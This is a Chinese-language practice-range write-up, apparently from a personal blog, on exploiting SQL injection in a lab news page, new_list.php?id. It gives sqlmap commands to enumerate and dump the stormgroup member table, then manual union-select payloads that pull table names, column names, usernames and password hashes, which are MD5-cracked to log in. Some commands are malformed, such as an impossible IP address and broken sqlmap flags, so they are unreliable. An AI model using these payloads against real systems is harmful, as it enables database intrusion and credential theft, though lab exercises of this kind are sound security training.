1.SQL注入漏洞测试(布尔盲注)
首先进入靶场,
然后点击上图通知,进入
然后打开sqlmap
输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名
得到数据库名为stormgroup
然后输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup --tables
爆出该数据库内的表
得到两个表,显然我们要member
输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup -T -member --columns
终于我们得到了可爱的name和password
然后激动人心的一刻到了
输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup -T -member -C name,password --dump
哈哈哈,得到了两个用户和密码,经过尝试,md5解得的两个密码都不能用,what’s happened???(难受)
上一次第二个密码都能进去!!!
OKK…
SQL手工注入漏洞测试(MySQL数据库-字符型
(这题没多大懂)
点通知进入
首先判断是否存在判断点
加 ‘ 出错,
加 ’ and 1=1%23正常,加‘ and 1=2%23出错
存在注入点,然后判断字段数
加’ order by n%23(n为1,2,3…)
到 5 时出错,即字段数为4
然后判断回显位置,输入id=1’ union select 1,2,3,4%23
然后再判断数据库和用户,输入id=1’ union select 1,database(),user(),4%23
再查寻表,输入id=1’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
然后再查询字段,输入id=1’ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘stormgroup_member’%23
发现了我们梦寐以求的name和password,然后查询这两个字段值,输入id=’ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member %23
????,MD5解码
登录,得到flag!